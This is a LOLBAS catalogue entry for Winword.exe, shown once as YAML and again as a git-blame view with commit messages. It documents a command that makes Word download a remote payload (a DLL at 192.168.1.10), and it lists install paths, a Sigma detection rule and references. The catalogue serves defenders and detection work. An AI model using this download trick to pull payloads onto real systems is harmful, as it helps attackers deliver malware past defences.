LOLBAS/yml/OtherMSBinaries/Winword.yml

---
Name: Winword.exe
Description: Microsoft Office binary
Author: 'Reegun J (OCBC Bank)'
Created: 2019-07-19
Commands:
  - Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"
    Description: Downloads payload from remote server
    Usecase: It will download a remote payload and place it in the cache folder
    Category: Download
    Privileges: User
    MitreID: T1105
    OperatingSystem: Windows
Full_Path:
  - Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe
  - Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office16\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe
  - Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office15\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe
  - Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office14\winword.exe
  - Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
  - Path: C:\Program Files\Microsoft Office\Office12\winword.exe
Code_Sample:
  - Code:
Detection:
  - Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml
  - IOC: Suspicious Office application Internet/network traffic
Resources:
  - Link: https://twitter.com/reegun21/status/1150032506504151040
  - Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191
Acknowledgement:
  - Person: 'Reegun J (OCBC Bank)'
    Handle: '@reegun21'
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:44:27 +02:00			`---`
			`Name: Winword.exe`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:58:03 +02:00			`Description: Microsoft Office binary`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:44:27 +02:00			`Author: 'Reegun J (OCBC Bank)'`
Standardise date formats (see https://yaml.org/type/timestamp.html) 2021-01-10 16:04:52 +01:00			`Created: 2019-07-19`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:44:27 +02:00			`Commands:`
			`- Command: winword.exe "http://192.168.1.10/TeamsAddinLoader.dll"`
			`Description: Downloads payload from remote server`
			`Usecase: It will download a remote payload and place it in the cache folder`
			`Category: Download`
			`Privileges: User`
			`MitreID: T1105`
			`OperatingSystem: Windows`
			`Full_Path:`
Update Winword.yml 2020-12-03 02:03:08 +01:00			`- Path: C:\Program Files\Microsoft Office\root\Office16\winword.exe`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:44:27 +02:00			`- Path: C:\Program Files (x86)\Microsoft Office 16\ClientX86\Root\Office16\winword.exe`
			`- Path: C:\Program Files\Microsoft Office 16\ClientX64\Root\Office16\winword.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office16\winword.exe`
			`- Path: C:\Program Files\Microsoft Office\Office16\winword.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office 15\ClientX86\Root\Office15\winword.exe`
			`- Path: C:\Program Files\Microsoft Office 15\ClientX64\Root\Office15\winword.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office15\winword.exe`
			`- Path: C:\Program Files\Microsoft Office\Office15\winword.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office 14\ClientX86\Root\Office14\winword.exe`
			`- Path: C:\Program Files\Microsoft Office 14\ClientX64\Root\Office14\winword.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office14\winword.exe`
			`- Path: C:\Program Files\Microsoft Office\Office14\winword.exe`
			`- Path: C:\Program Files (x86)\Microsoft Office\Office12\winword.exe`
			`- Path: C:\Program Files\Microsoft Office\Office12\winword.exe`
			`- Path: C:\Program Files\Microsoft Office\Office12\winword.exe`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:58:03 +02:00			`Code_Sample:`
			`- Code:`
			`Detection:`
$frack113$ Update old sigma link (#303) * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHQ ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> * Update SigmaHq ref Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> --------- Signed-off-by: frack113 <62423083+frack113@users.noreply.github.com> 2023-10-18 17:30:34 +02:00			`- Sigma: https://github.com/SigmaHQ/sigma/blob/683b63f8184b93c9564c4310d10c571cbe367e1e/rules/windows/process_creation/proc_creation_win_office_arbitrary_cli_download.yml`
Detection Resources and Other Updates (#179) * Add detection links for scripts * Add detection links for OtherMSBins. Fixed and updated as needed. * Add detection links for MSBins. Fixed and updated as needed. * Add detection links for oslibraries * Updating template for Detections * Removing empty Detection:Sigma entries * Remove redundant blank line * Replacing commit URL with file URL Co-authored-by: root <root@DESKTOP-5CR935D.localdomain> Co-authored-by: Wietze <wietze@users.noreply.github.com> 2021-11-15 14:19:03 +01:00			`- IOC: Suspicious Office application Internet/network traffic`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:44:27 +02:00			`Resources:`
			`- Link: https://twitter.com/reegun21/status/1150032506504151040`
			`- Link: https://medium.com/@reegun/unsanitized-file-validation-leads-to-malicious-payload-download-via-office-binaries-202d02db7191`
			`Acknowledgement:`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:58:03 +02:00			`- Person: 'Reegun J (OCBC Bank)'`
Added Office binaries from jreegun to the project. Pull request 42 2019-09-17 22:44:27 +02:00			`Handle: '@reegun21'`